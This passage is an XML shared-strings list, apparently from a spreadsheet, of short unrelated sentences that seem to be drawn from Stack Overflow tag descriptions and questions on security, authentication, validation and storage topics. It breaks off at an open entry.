  <si>
    <t>Yowsup is a Python library that allows you to login and use the WhatsApp service and provides you with all capabilities of an official WhatsApp client, allowing you to create a full-fledged custom WhatsApp client.</t>
  </si>
  <si>
    <t>Mercurial metadata file that stores hashes of tagged commits in a Mercurial repository.</t>
  </si>
  <si>
    <t>In it also used to validating models by using random subsets (bootstrapping, cross validation).</t>
  </si>
  <si>
    <t>Obfuscar is an open source .NET obfuscator released under MIT license.</t>
  </si>
  <si>
    <t>To sign users into an app that integrates Google+ features, Google Sign-In helps  with social scopes</t>
  </si>
  <si>
    <t>Shield is a plugin for Elasticsearch that enables you to easily secure a cluster.</t>
  </si>
  <si>
    <t>Always Encrypted is a feature of Microsoft SQL Server 2016 and Azure SQL Database, designed to protect sensitive data.</t>
  </si>
  <si>
    <t>The Ltac language, Coq's domain-specific language for proof search procedures.</t>
  </si>
  <si>
    <t>Remix focuses on the development and deployment of Solidity written smart contracts using the Ethereum blockchain.</t>
  </si>
  <si>
    <t>It should not be used for general-purpose email validation; instead, use [email-validation].</t>
  </si>
  <si>
    <t>It is an upgrade of TLS version 1.2, and provides improvements in speed, efficiency, security and privacy.</t>
  </si>
  <si>
    <t>Notary is a tool for publishing and managing trusted collections of content.</t>
  </si>
  <si>
    <t>The Boost.Tokenizer C++ library provides a flexible and easy to use way to break a string or other character sequence into a series of tokens.</t>
  </si>
  <si>
    <t>It may also be used for securing browser plugins, and in the future parts of other applications or full applications.</t>
  </si>
  <si>
    <t>Validation happens usually via on-line validators (like W3C Jigsaw) and depends on CSS version.</t>
  </si>
  <si>
    <t>SCLM provides versioning, auditing, and promotion of source code, object code, test cases, etc.</t>
  </si>
  <si>
    <t>The exact systems or components that are subject to audit are determined by the risk exposure of the overall system.</t>
  </si>
  <si>
    <t>The jQuery BlockUI Plugin lets you simulate synchronous behavior when using AJAX, without locking the browser.</t>
  </si>
  <si>
    <t>With HTSQL, databases can be accessed, secured, cached, and integrated using standard web technologies.</t>
  </si>
  <si>
    <t>Version 1.0, under the name Screen Profiles, came out of discussions at the 2008 Ubuntu Developer Summit about how to simplify the on screen notification of an administrator connected to a server.</t>
  </si>
  <si>
    <t>All queries use prepared statements and are protected against SQL injection.</t>
  </si>
  <si>
    <t>The core of Catel contains an IoC container, models, validation, memento, message mediator, argument checking, etc.</t>
  </si>
  <si>
    <t>You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.</t>
  </si>
  <si>
    <t>FileProvider supports easy sharing of private files between Android apps.</t>
  </si>
  <si>
    <t>The .NET  class that allows custom validation of any UI input element</t>
  </si>
  <si>
    <t xml:space="preserve">
Protocols: TLS 1.0 support (partial)
Certificates: X.509 Certificate parsing and validation, built-in Root CAs.</t>
  </si>
  <si>
    <t>Highly optimised lightweight simplified payment verification (SPV)
mode.</t>
  </si>
  <si>
    <t>Eliminate anonymous inner-classes for listeners by annotating methods with @OnClick and
others.</t>
  </si>
  <si>
    <t>This is different from most object-oriented languages, which do not insist on intrinsic identification, and so cannot be formalised in mathematical logic.</t>
  </si>
  <si>
    <t>Secure your PDFs using electronic signatures and manipulate them using full DDX support.</t>
  </si>
  <si>
    <t>This is not only a speed feature but also a security feature, directly relevant to the recent collapse of the Sony PlayStation 3 security system.</t>
  </si>
  <si>
    <t>Additionally it includes Blowfish, SCrypt, and PBKDF2 for any HMAC (.NET's built-in PBKDF2 implementation supports only SHA-1).</t>
  </si>
  <si>
    <t>Upcoming features
Secure cookies (client side sessions).</t>
  </si>
  <si>
    <t>For more information about authorization constraints, see Specifying an Authentication Mechanism in the Deployment Descriptor.</t>
  </si>
  <si>
    <t>ejb passivation refers to Stateful EJB Session Beans being passivated, or deactivated, to a secondary storage.</t>
  </si>
  <si>
    <t>The template contains the basic features including user login/logout and a contact page.</t>
  </si>
  <si>
    <t>Jepsen has been used to verify everything from eventually-consistent commutative databases to linearizable coordination systems to distributed task schedulers.</t>
  </si>
  <si>
    <t>At a Glance
You define a validation schema and pass it to an instance of the Validator class:
Then you simply invoke the  to validate a dictionary against the schema.</t>
  </si>
  <si>
    <t>Cassandra, a replicated, fault-tolerant, decentralized and
scalable database system.</t>
  </si>
  <si>
    <t>Rijndael is not widely supported, most cryptography libraries supporting only the AES subset.</t>
  </si>
  <si>
    <t>PasswordResetForm), we reimplemented few things to fit better into Single Page App architecture.</t>
  </si>
  <si>
    <t>By default, if your app targets Android Q, it has a sandboxed view of
  the files that are on an external storage device.</t>
  </si>
  <si>
    <t>Named CALs, Document CALs, Session CALs (Concurrent) and Usage CALs are user license options available.</t>
  </si>
  <si>
    <t>This contrasts with web of trust models, like PGP, where anyone (not just special CAs) may sign and thus attest to the validity of others' key certificates.</t>
  </si>
  <si>
    <t>Manifests uniquely identify the assembly through the assembly's assemblyIdentity element.</t>
  </si>
  <si>
    <t>The PKINIT extension (RFC 4556) adds support for public-key cryptography.</t>
  </si>
  <si>
    <t>By extending the verification vectors JAAS extends the security architecture for Java applications that require authentication and authorization modules.</t>
  </si>
  <si>
    <t>NxBRE is released under LGPL license in order to allow users to legally build commercial solutions that embed NxBRE.</t>
  </si>
  <si>
    <t>The tag transparency should be used for the general subject of transparency in images.</t>
  </si>
  <si>
    <t>As with other Java technologies, Java CAPS provides no specific vendor lock-in and supports a variety of operating systems.</t>
  </si>
  <si>
    <t>Just to be safe, I'll also include the Arduino code that receives NFC messages on the other side.</t>
  </si>
  <si>
    <t>The Storage Rules are completely public no auth needed.</t>
  </si>
  <si>
    <t>I'm currently developing user authentication system for my Raspberry Pi based home automation system.</t>
  </si>
  <si>
    <t>Windows10 IOT enterprise has a feature to protect write access on drives.</t>
  </si>
  <si>
    <t>You can try to stick to azure-storage 0.32.0 to avoid using cryptography if you don't need the new features of 0.33.0.</t>
  </si>
  <si>
    <t>Spring Security SAML Extension enables seamless inclusion of SAML 2.0 Service Provider capabilities in Spring applications.</t>
  </si>
  <si>
    <t>Exonum is an extensible open-source framework for creating blockchain applications.</t>
  </si>
  <si>
    <t>This includes Oauth and OAuth 2.0, Activity Streams, and portable contacts, among others.</t>
  </si>
  <si>
    <t>Possibly integrate with Flask-Principal or other authorization extensions later on.</t>
  </si>
  <si>
    <t>Major mainframe subsystems, especially DB2 Version 8, use RACF to provide multi-level security (MLS).</t>
  </si>
  <si>
    <t>Samsung KNOX Workspace provides key enhancements for 
reinforced hardware and software security with a multi-layered
strategy.</t>
  </si>
  <si>
    <t>With this array set, each call to insert() or update() will validate the data before allowing the query to be run.</t>
  </si>
  <si>
    <t>Referential integrity is a relational database concept which states that table relationships must always be consistent.</t>
  </si>
  <si>
    <t>Unlike reflection, MethodHandles have consistent security model which allows to control the access to non-public methods.</t>
  </si>
  <si>
    <t>When present, it specifies that the &lt;input&gt; element should not be validated when submitted.</t>
  </si>
  <si>
    <t>Core authentication, data and media storage mechanisms are isolated in the PHP middleware.</t>
  </si>
  <si>
    <t>Interstage Application Server (including Interstage Web Server)
Interstage Business Application Server
Interstage Security Director
Interstage Trafic Director 
This one is the best use proven application server is the Interstage Application Server is.</t>
  </si>
  <si>
    <t>ChroPath
ChroPath is used to generate &amp; validate unique selectors like relative xpath in devtools panel itself.</t>
  </si>
  <si>
    <t>It also allows users to cache the public keys (in the form of certificates) of their communicating peers.</t>
  </si>
  <si>
    <t>For information on MongoDB Security, view the Security section of the MongoDB Manual which includes a MongoDB Security Checklist.</t>
  </si>
  <si>
    <t>The ideal solution would be to redesign your PCB to include the authentication processor.</t>
  </si>
  <si>
    <t>FoxyProxy is an advanced proxy management tool for Firefox, Chorme and IE</t>
  </si>
  <si>
    <t>The device includes Internet browsing and networking capabilities.</t>
  </si>
  <si>
    <t>inclusion of the new crypto extension (maybe support other backends
than openssl).</t>
  </si>
  <si>
    <t>OSSEC is a full platform to monitor and control your systems.</t>
  </si>
  <si>
    <t>You can validate it if you are running the monitor for the ESP32.</t>
  </si>
  <si>
    <t>Examples of notable competitions include Google Code Jam, Facebook Hacker Cup, ACM ICPC, IOI and online contests like TopCoder SRM, Codeforces, CodeChef and others.</t>
  </si>
  <si>
    <t>Detection activity exist in many ways.</t>
  </si>
  <si>
    <t>For that you need a sophisticated clone detection engine.</t>
  </si>
  <si>
    <t>ASP.NET supports user authentication and authorization through a provider-based model.</t>
  </si>
  <si>
    <t>Authy is a Twilio service to implement two-factor authentication.</t>
  </si>
  <si>
    <t>aurelia-auth is a token-based authentication plugin for Aurelia</t>
  </si>
  <si>
    <t>In order to receive these notification events, the implementation class must be either declared in the deployment descriptor of the web application, annotated with WebListener, or registered via one of the addListener methods defined on ServletContext.</t>
  </si>
  <si>
    <t>With the number of tasks that need to be accomplished to make, build, and maintain a safe, clean, policy-abiding package, bare Makefile rules files can become very large and cumbersome.</t>
  </si>
  <si>
    <t>Google Sign-In lets users skip high drop-off registration forms and avoid having to remember yet another username and password.</t>
  </si>
  <si>
    <t>Depending on how this method is written, it might validate the data and then set the value of Person1.age, or use the data to fill in a record in a database.</t>
  </si>
  <si>
    <t>Along with its core, Grails has a plugin architecture and library that can provide developers with common web application features like Security and dynamic UI tools.</t>
  </si>
  <si>
    <t>Another common design would be a private OpenStack cloud with a replicated site that would be used for high availability or disaster recovery.</t>
  </si>
  <si>
    <t>As is is anyway too complicated, you can use the following:
This safes you one additional shift and the explicit masking and some registers.</t>
  </si>
  <si>
    <t>Declarative security is a syntax that uses [tag:attributes] to place security information into the [tag:metadata] of the code.</t>
  </si>
  <si>
    <t>Factual, launched in October 2009, is an open data platform developed to maximize data accuracy, transparency, and accessibility.</t>
  </si>
  <si>
    <t>The Facebook Friend relationship between two users is one of the primary considerations in the application of the users' privacy settings and in the composition of content in each Facebook user's timeline, newsfeed and other views.</t>
  </si>
  <si>
    <t>Is there any other fast and secure way to transport the user input from the frontend to the business logic?</t>
  </si>
  <si>
    <t>I don't know much about encryption or synchronization, but I want to find a way that is reasonably safe and not more than reasonably complex and doesn't use any external services...</t>
  </si>
  <si>
    <t>Or is it that Bluemix,WIoTP currently doesn't support specifying custom credentials as part of cf bind-service command.</t>
  </si>
  <si>
    <t>Make sure the value of Authorization header is formed correctly including the signature.</t>
  </si>
  <si>
    <t>When trying to install visual studio code on my raspberry pi 3, it would say  
The following packages cannot be authenticated!</t>
  </si>
  <si>
    <t>Here is my code (some info has been revised for privacy):
and the request headers:
and form data:
buttonClicked=4&amp;redirect_url=&amp;err_flag=0&amp;username=XXXXXXXXX&amp;password=XXXXXXXX
However, it seems that I miss something because I still didn't get the full access to the Internet.</t>
  </si>
  <si>
    <t>I am trying to get a file from s3 bucket  using raspberrypi, i have full access for S3,still there is an error saying s3: error 403: forbidden, on googling about it,it says my device doesn't have the required permissions but i am using the ask cli with my access key and secret key and as stated earlier i have full access for s3, still this error can anyone please help?</t>
  </si>
  <si>
    <t>My last resort was installing spyder-kernels inside my conda envs, but this seems to be impossible due to a conflict with jupyter-client.</t>
  </si>
  <si>
    <t>memcpy, formally safe but complex and needlessly potentially inefficient,
using a formally UB union member access, or
safe but complex, splitting the value up and recombining.</t>
  </si>
  <si>
    <t>For the record, I used a Vodafone (Huawei) K5150, "officially" supported and Microsoft verified, according to the hardware compatibility list: https://developer.microsoft.com/en-us/windows/iot/win10/supportedinterfaces.</t>
  </si>
  <si>
    <t>Before I switched to linux full time, I used KiTTY, because it's much more configurable, and also allows stored plaintext passwords.</t>
  </si>
  <si>
    <t>The language you have created differs from these in your approach to tokenisation, but at its core -- putting the operand(s) before the operator -- it's a postfix language.</t>
  </si>
  <si>
    <t>It is easy to save fingerprint template to a file or database in hex format.</t>
  </si>
  <si>
    <t>Either change the permissions of /var/www or put the database in a folder that the process opening the database has write access to.</t>
  </si>
  <si>
    <t>Here Display Pin /Passkey is just the naming convention or hint to Agent developers to write wizard/UI or any form of display operations.</t>
  </si>
  <si>
    <t>Set MONGO_URL: 'mongodb://DB_USERNAME:USER_PASSWORD@DB_HOST_IP:DB_PORT/DB_NAME'
Remove:
mongo: {
    version: '3.4.1',
    servers: {
        one: {},
    },
}
I recommend the second option because is easier to backup your db.</t>
  </si>
  <si>
    <t>You have to run your webserver as a user that is currently logged into the startx server, easiest way to do this is to call a php embedded server in terminal from the X server to ensure that you have all necesarry permissions.</t>
  </si>
  <si>
    <t>Key mappings trigger  arbitrarily complex Ruby scripts written by the end users themselves or provided as plugins by others.</t>
  </si>
  <si>
    <t>svk is a decentralized version control system which makes use of the two underlying layers of Subversion.</t>
  </si>
  <si>
    <t>DotNetOpenAuth (formerly known as DotNetOpenId) is a library that brings easy and flexible OpenID, OAuth and InfoCard to the .NET platform</t>
  </si>
  <si>
    <t>There can be only one primary interop assembly, which must be signed with a strong name by the publisher of the COM type library.</t>
  </si>
  <si>
    <t>Its goal is to detect which of these indexing operations do not need to be validated at runtime, and eliminating those checks.</t>
  </si>
  <si>
    <t>The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.</t>
  </si>
  <si>
    <t>A third-party, type-safe, Swift-language layer over SQLite.</t>
  </si>
  <si>
    <t>In computer security, general access control includes identification, authorization, authentication, access approval, and audit.</t>
  </si>
  <si>
    <t>DAML is a contract modeling language running on the Digital Asset Ledger, and codifies multi-party agreements.</t>
  </si>
  <si>
    <t>With HTML5, new input types were created to update how users interact with forms and to help validate the data.</t>
  </si>
  <si>
    <t>Clear Linux OS is an open source, rolling release Linux distribution optimized for performance and security.</t>
  </si>
  <si>
    <t>It can take as input the files produced by several popular packet-capture programs, including tcpdump, snoop, etherpeek, HP Net Metrix, and WinDump.</t>
  </si>
  <si>
    <t>Code injection is a type of consequence due to Improper Control of Generation of Code (CWE-94), which causes unauthorized code to be executed.</t>
  </si>
  <si>
    <t>These capabilities will enable you to set up a highly available, fault tolerant cluster of Solr servers.</t>
  </si>
  <si>
    <t>Many form contracts are only contained in digital form, and only presented to a user as a click-through where the user must accept the agreement.</t>
  </si>
  <si>
    <t>In addition, Linux accept() may fail if:
EPERM
Firewall rules forbid connection.</t>
  </si>
  <si>
    <t>Once the correctness of a model has been established with Spin, that fact can be used in the construction and verification of all subsequent models.</t>
  </si>
  <si>
    <t>Any app accessing the database may die uncleanly or become disconnected from the file store at any point and the database cannot become corrupted.</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/ZAP
The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.</t>
  </si>
  <si>
    <t>An unsafe shared memory heap is also provided for the increased efficiency that results from that model.</t>
  </si>
  <si>
    <t>With minimal effort, user can add a trusted registration system that's familiar to users and consistent across devices.</t>
  </si>
  <si>
    <t>Special attention is given to the needs of concurrency, reliability, documentation, quality assurance, management and portability.</t>
  </si>
  <si>
    <t>Encryption Keys
This is mainly focused on 2 Keys
Column Master Key (CMK)
Column Encryption Key (CEK)
CMK
Creates a  metadata object in a database.</t>
  </si>
  <si>
    <t>Reliable:
Tokio leverages Rust's ownership and concurrency model to ensure thread safety.</t>
  </si>
  <si>
    <t>Restrictions/Disadvantages of developing portlets with Liferay
Accessing User in Liferay Portlet
Testing for custom plugin portlet
Accessing logged-in User in a liferay portlet
Programmatically get the url of a page in liferay</t>
  </si>
  <si>
    <t>Fujitsu NetCOBOL is a COBOL compiler and runtime environment that claims to offers superior performance, scalability, and security, with no associated runtime fees.</t>
  </si>
  <si>
    <t>And from the PyCrypto GitHub repository:
One possible application of the modules is writing secure
  administration tools.</t>
  </si>
  <si>
    <t>Create standard CRUD controllers with simple or form-request validation.</t>
  </si>
  <si>
    <t>This tag is blacklisted (see The mystery of hidden-features tag), use this search to list them all.</t>
  </si>
  <si>
    <t>This plugin is strictly linked to the following Maven phases: , verify.</t>
  </si>
  <si>
    <t>The UserVoice API exposes the core end-user and admin functionality of UserVoice to make it easy for you to build client applications or integrations with your own systems.</t>
  </si>
  <si>
    <t>MozyPro requires a separate license for each computer that is being backed up, as well as a server license for any server that is being backed up.</t>
  </si>
  <si>
    <t>Vary the
language of your validation messages according to the current
thread's culture.</t>
  </si>
  <si>
    <t>An absolute (or full) path is the general form of the name of a file or directory that specifies a unique location in a file system.</t>
  </si>
  <si>
    <t>tag can be used to refer Profession software edition from SmartBear such as SoapUI NG Pro, LoadUI NG Pro, Secure, ServiceV, and API Monitoring.</t>
  </si>
  <si>
    <t>Other tags that have the WPS acronym include:
wifi-protected-setup
websphere-process-server
Implementations: 
PyWPS
Zoo
GeoServer
52 north</t>
  </si>
  <si>
    <t>List item:
CXF supports a variety of web service specifications including WS-Addressing, WS-Policy, WS-ReliableMessaging and WS-Security.</t>
  </si>
  <si>
    <t>I have this code on my Angular App controller:
It throws a 404 status error when I do the alert, however, this happens on Safari iOS but not on iOS Chrome, where the request works fine.</t>
  </si>
  <si>
    <t>I have 2 Pi on 2 separate networks, running raspbian, one is a web server, the other is used to backup (let's say pi-server and pi-backup), and I would like pi-server to ssh to pi-backup in order to backup data.</t>
  </si>
  <si>
    <t>There is undocumented behavior that nested multi-transclusion in routes are not compiled down till the children.</t>
  </si>
  <si>
    <t>The cookielib module defines classes for automatic handling of HTTP cookies.</t>
  </si>
  <si>
    <t>Greenlock is a suite of tools for automated https created by ppl for use on web servers and IoT devices.</t>
  </si>
  <si>
    <t>Typically Validation is used in checking input data, and in verifying data before storage.</t>
  </si>
  <si>
    <t>A feature presented on Android Q, to sandbox storage of apps.</t>
  </si>
  <si>
    <t>Data recovery is a process of salvaging inaccessible data from corrupted or damaged storage when the data cannot be accessed in a normal way.</t>
  </si>
  <si>
    <t>It gives him the power to integrate CAL with ease into his number verification application.</t>
  </si>
  <si>
    <t>You no longer have to write your own registration or subscription retry logic.</t>
  </si>
  <si>
    <t>Serpent is one of the high-level programming languages used to write ethereum smartcontracts.</t>
  </si>
  <si>
    <t>Some annotation processors, such as Project Lombok, achieve the latter via undocumented internal Javac API.</t>
  </si>
  <si>
    <t>I've searched the docs but can't seem to find anything about acknowledging notifications.</t>
  </si>
  <si>
    <t>SvnAnt is a third-party task for  Apache Ant that provides an interface to Subversion revision control system.</t>
  </si>
  <si>
    <t>It is so easy to prevent your online forms from automated spam by simply adding RadCaptcha to your ASP.NET application.</t>
  </si>
  <si>
    <t>Operational and informational intelligence combined to leverage your data and turn it into profitable actions.</t>
  </si>
  <si>
    <t>ngBootbox includes three directives, one for each of alert, confirm and prompt.</t>
  </si>
  <si>
    <t>This includes splitting the input into meaningful bits of information (tokenization) and jugding the relevance of a signal.</t>
  </si>
  <si>
    <t>Accessibility Inspector is an app present in OSX which allows to inspect the accessibility attributes in an user interface.</t>
  </si>
  <si>
    <t>OpenWRT is a Linux-based firmware program for embedded devices such as residential gateways and routers.</t>
  </si>
  <si>
    <t>I have not included the other file in my code which includes all my Temboo account information.</t>
  </si>
  <si>
    <t>Please make sure you have the correct access rights
and the repository exists.</t>
  </si>
  <si>
    <t>I am adding my Authentication(Cognito user pool authentication) activity and Connect activity.</t>
  </si>
  <si>
    <t>On CentOS, these settings should work:
export SSL_CERT_DIR=/etc/pki/tls/certs
  export SSL_CERT_FILE=/etc/pki/tls/cert.pem</t>
  </si>
  <si>
    <t>Wireless extensions are somewhat oldschool and may not be supported by the driver very well.</t>
  </si>
  <si>
    <t>Teamstudio Analyzer ia a database documentation and code-quality auditing tool.</t>
  </si>
  <si>
    <t>I want to extract additional attributes from the certificate, e.g.</t>
  </si>
  <si>
    <t>Apache SSHD is a Java library based on Apache MINA to support SSH protocols like SCP or SFTP both client and server side.</t>
  </si>
  <si>
    <t>Octopress - A blogging framework for hackers based on Jekyll.</t>
  </si>
  <si>
    <t>A krypt shim that provides the same interface as the Ruby OpenSSL extension.</t>
  </si>
  <si>
    <t>i.e it will search through the
  tables within the database for the given tag, and when found, it must
  Identify the table from which the tag exists and give necessary
  permissions to the arduino.</t>
  </si>
  <si>
    <t>do you think it is possible to implement a feature like the following one Google Home Setup in order to let the voice AIY kit to be discoverable in a wifi network and have a person logging in to it?</t>
  </si>
  <si>
    <t>Commons uses of multipart subtypes include:
MHTML
Form Upload
Digest Authentication
Alternative Content
References
multipart media types specification
multipart/form-data specification</t>
  </si>
  <si>
    <t>Please open a support ticket to investigate and provide the following client request id:_______
But when running the same query after removing anomaly function  works fine.</t>
  </si>
  <si>
    <t>This is a library project which makes the life much easier by coding less code for being able to login, publish feeds and open graph stories, invite friends and more.</t>
  </si>
  <si>
    <t>Since the software is not a development tool you may not ask on stack overflow about this except in case of conflicts with your own code or, more in general, when interested in the internals of antivirus code.</t>
  </si>
  <si>
    <t>Better exception message when context/database initialization fails due to connectivity issues with the database.</t>
  </si>
  <si>
    <t>Concerning the kernel, I'm pretty sure that it will either support this or raise an according error, otherwise this would be too easy to exploit.</t>
  </si>
  <si>
    <t>In manifest file, declare internet permission outside application tag : 
Create an activity (WebViewActivity.java)
}
In MainActivity, just start the above created activity.</t>
  </si>
  <si>
    <t>x86 protected mode allows system software to support virtual memory, paging and preemptive multi-tasking.</t>
  </si>
  <si>
    <t>XAuth is a Twitter API method that allows easy OAuth access token retrieval for an account without going through a full OAuth authentication sequence.</t>
  </si>
  <si>
    <t>Built-in and custom implementations of ASP.NET's Role Provider, as part of Membership functionality in the System.Web.Security namespace.</t>
  </si>
  <si>
    <t>LibClang provides the following features:
C/C++/ObjC/ObjC++ code parsing and syntax checking,
AST indexing and cross-referencing,
source code tokenization (e.g.</t>
  </si>
  <si>
    <t>It uses a fluent syntax to perform validation, a simple example is:
For more information, see the GitHub page.</t>
  </si>
  <si>
    <t>Views can be explicitly registered or dynamically generated and listening to view changes is possible.</t>
  </si>
  <si>
    <t>Amazon QLDB is a fully managed ledger database that provides a transparent, immutable, and cryptographically verifiable transaction log owned by a central trusted authority.</t>
  </si>
  <si>
    <t>On the regular-user side, I'm part of the Charcoal team (who are responsible for the spam-detection bot, SmokeDetector) which lets me do the janitorial work in cleaning up spam; I drop into SOCVR occasionally to see if there's anything that needs some helping hands.</t>
  </si>
  <si>
    <t>So I'd want to add it to the end of the sentence to make it like this
$HMTV,13534,-58,50:65,00,0F,40,*75
and send it out so that I can validate the checksum on the other side.</t>
  </si>
  <si>
    <t>from:
    [Service]
    ExecStart=/usr/bin/python3 -u main.py
    WorkingDirectory=/custom/LEDSS
to:
    [Service]
    ExecStart=/usr/bin/python /custom/LEDSS/service_status_led.py
One other thing I did was ensure permissions on the .service file were correct.</t>
  </si>
  <si>
    <t>This could be used for the development of IoT and smart hardware prototype, making it continent to verify the software and function of users.</t>
  </si>
  <si>
    <t>There are certain formats that must be used, such as Uniform Resource Identifier(URI) to get to the metadata if this format is not used the metadata becomes inaccessible.</t>
  </si>
  <si>
    <t>OpenALPR is an open source Automatic License Plate Recognition library written in C++ with bindings in C#, Java, Node.js, and Python.</t>
  </si>
  <si>
    <t>Manateeworks is a barcode scanning SDK for mobile which supports ios, android, windows-phone among other platforms and has developer SDK for various frameworks.</t>
  </si>
  <si>
    <t>ACRCloud is a comprehensive automatic content recognition platform with audio fingerprinting technology.</t>
  </si>
  <si>
    <t>To change the output, the developer must return to the Uniface Development Environment (UDE) to modify and recompile, thereby maintaining the integrity of the repository.</t>
  </si>
  <si>
    <t>You can find them in the following directory:
/sdcard/WhatsApp/Databases
Common crypt12 Filenames
msgstore.db.crypt12 - Name of the file that contains the database of chat messages.</t>
  </si>
  <si>
    <t>In my case, it's the user www-data, so I gave that user full sudo permissions without a password, and did the following commands:
sudo -u pi googler --np --json -C -n 1 -w youtube.com -x thomas the dank engine
as well as
su - pi -c 'googler --np --json -C -n 1 -w youtube.com -x thomas the dank engine'
neither of these worked.</t>
  </si>
  <si>
    <t>Refer to the datasheet for an exact list, but it would include:
&lt; mcc &gt; : mobile country code
&lt; mnc &gt; : mobile network code
&lt; bsic &gt; : base station identification code
&lt; lac &gt; : location area code
  With the bsic, you can use a database to find your location.</t>
  </si>
  <si>
    <t>Elasticsearch 2.0 takes huge strides forward in terms of speed, security, scalability, and hardware efficiency.</t>
  </si>
  <si>
    <t>Premade userscripts:
Premade userscripts can be found at:
Userscripts.org -- Oldest and most extensive, but plagued with spam and reliability problems as of Spring 2014.</t>
  </si>
  <si>
    <t>I am building a POC that uses an unlocked cellphone with only SMS capability to send GPS info to a central server.</t>
  </si>
  <si>
    <t>Additional debug info:
gstrtpjitterbuffer.c(3247): gst_rtp_jitter_buffer_chain (): /GstPipeline:pipeline0/GstRtpJitterBuffer:rtpjitterbuffer0:
Received invalid RTP payload, dropping
I am open to suggestions, Thanks</t>
  </si>
  <si>
    <t>I was able to figure it out - gmail has a new two factor authentication requirement, so i had to generate a password specific to this app.</t>
  </si>
  <si>
    <t>I believe the language here is deliberately less specific to allow room for cases when a device builder has a secure or unique way (e.g.</t>
  </si>
  <si>
    <t>A C++ testing framework to create fake mock objects.</t>
  </si>
  <si>
    <t>Users can subscribe to notifications, and administrators can make some notifications mandatory.</t>
  </si>
  <si>
    <t>My Android app manage to connect to Arduino's WiFi shield, but I have an issue with implementing the TCP client, on Android side.</t>
  </si>
  <si>
    <t>So the code at high level does this:
Turns on the AP interface
Some one would connect to , which would have a form for username and password.</t>
  </si>
  <si>
    <t>The best you can probably do is store the templates on your database but use it as a second factor to authenticate users.</t>
  </si>
  <si>
    <t>Duplicity is a program for encrypted incremental backups to local or remote storage</t>
  </si>
  <si>
    <t>EJB passivation refers to Stateful EJB Session Beans being passivated, or deactivated, to a secondary storage.</t>
  </si>
  <si>
    <t>CompCert is a formally verified C compiler for a large subset of the C programming language.</t>
  </si>
  <si>
    <t>They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection.</t>
  </si>
  <si>
    <t>Both host-based access restrictions and password-based authentication may be implemented simultaneously.</t>
  </si>
  <si>
    <t>Security-Enhanced Linux (selinux) is a National Security Agency research project to modify the Linux kernel with enhanced security-related functions, including mandatory access control.</t>
  </si>
  <si>
    <t>SvnAnt is a third-party task for Apache Ant that provides an interface to Subversion revision control system.</t>
  </si>
  <si>
    <t>I am using  #include adafruit Fingerprint.h library by adafruit and #include softwareSerial.h Standard Libraries.</t>
  </si>
  <si>
    <t>Protocols supported
  include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet.</t>
  </si>
  <si>
    <t>About RadCaptcha
It is so easy to prevent your online forms from automated spam by simply adding RadCaptcha to your ASP.NET application.</t>
  </si>
  <si>
    <t>Traps are often used by network management systems to detect faults or deviations in the monitored devices.</t>
  </si>
  <si>
    <t>If you want more storage and flexibility, you could go for Trusted Objects TO-136.</t>
  </si>
  <si>
    <t>What the PREEMPT_RT patch does is support priority based preemption.</t>
  </si>
  <si>
    <t>OpenID Connect Provider and OAuth 2.0 Authorization Server Framework based on ASP.NET Core</t>
  </si>
  <si>
    <t>It also has ssh, SFTP and FTP access, as well as a web-based control panel.</t>
  </si>
  <si>
    <t>Support memory safe programming.</t>
  </si>
  <si>
    <t>The getter method may perform other tasks such as validation, but is usually considered non-mutating.</t>
  </si>
  <si>
    <t xml:space="preserve">
I know how to auto login to the Raspberry Pi on start up with the graphical interface using lightdbm.</t>
  </si>
  <si>
    <t>Is there a way, and how to implement myself the support of this WIFI security please?</t>
  </si>
  <si>
    <t>It is an alternative to lock-based synchronization.</t>
  </si>
  <si>
    <t>Users can also customize the policy by implementing CookiePolicy.</t>
  </si>
  <si>
    <t>It includes:
Account, address-book and multi-sig management.</t>
  </si>
  <si>
    <t>It provides an interface to integrate Coinbase Wallet into a PHP project.</t>
  </si>
  <si>
    <t>This non-security update includes quality improvements:
Addressed issue where developers could not build UWP apps on Windows 7 because MRMSupport.dll failed to load.</t>
  </si>
  <si>
    <t>I've implemented my own write caching/buffering strategy to help prevent locks, which helped significantly, but it did not solve the delay at startup problem.</t>
  </si>
  <si>
    <t>**Filters** in ASP.NET MVC are attributes applied to controllers or actions that modify their behavior respecting authorization, caching, error-handling and more.</t>
  </si>
  <si>
    <t>From a
database perspective, storage-level encryption has the advantage to be transparent,
thus avoiding any changes to existing applications.</t>
  </si>
  <si>
    <t>The Zend InputFilter component can be used to filter and validate generic sets of input data (most commonly data from incoming GET or POST requests).</t>
  </si>
  <si>
    <t>so you can rewrite the statement like this:
the "++" operator simply adds 1 to the variable, so you can rewrite as:
CharacterMask is a 3-dimensional array that describes a typical telephone keypad.</t>
  </si>
  <si>
    <t>MQTT broker in wso2 IoT Server has a pluggable authentication and authorization, by default it comes with an OAuth based authentication, where it uses an empty password and uses an OAuth token for the username.</t>
  </si>
  <si>
    <t>Here is how I create this user for my development container in the Dockerfile:
These dockerfile instructions create a non-root user, with its own user group, and includes it in the uucp group to access TTY devices in Debian.</t>
  </si>
  <si>
    <t>BTW, the WebSocket client we will release ONLY support unsecure WebSocket connection (not SSL), and the secure version(wss) will be coming in future.</t>
  </si>
  <si>
    <t>It is generated from an assembly file (the file that contains the assembly manifest, which in turn contains the names and hashes of all the files that make up the assembly), using the corresponding private key.</t>
  </si>
  <si>
    <t>This is useful during the process of development and for testing the application before it is put in production mode, especially for checking the security related aspects.</t>
  </si>
  <si>
    <t>EasyRTC is a full-stack open source WebRTC toolkit suitable for building highly secure, WebRTC applications.</t>
  </si>
  <si>
    <t>A way to store personal information to make it easier for a user to fill in forms or login to websites at a later time.</t>
  </si>
  <si>
    <t>Some "safe" languages like Swift and Go offer "unsafe" pointers for use with APIs written in languages like C and Objective-C.</t>
  </si>
  <si>
    <t>Gitosis is software to manage a collection of Git repositories on a server accessible by SSH, without creating local accounts for the users.</t>
  </si>
  <si>
    <t>Boogie is an intermediate verification language created at Microsoft Research, intended as a layer on which to build program verifiers for other languages.</t>
  </si>
  <si>
    <t>In C# or Rust, the unsafe keyword marks code able to work directly with memory pointers, bypassing some of the language's safety checks.</t>
  </si>
  <si>
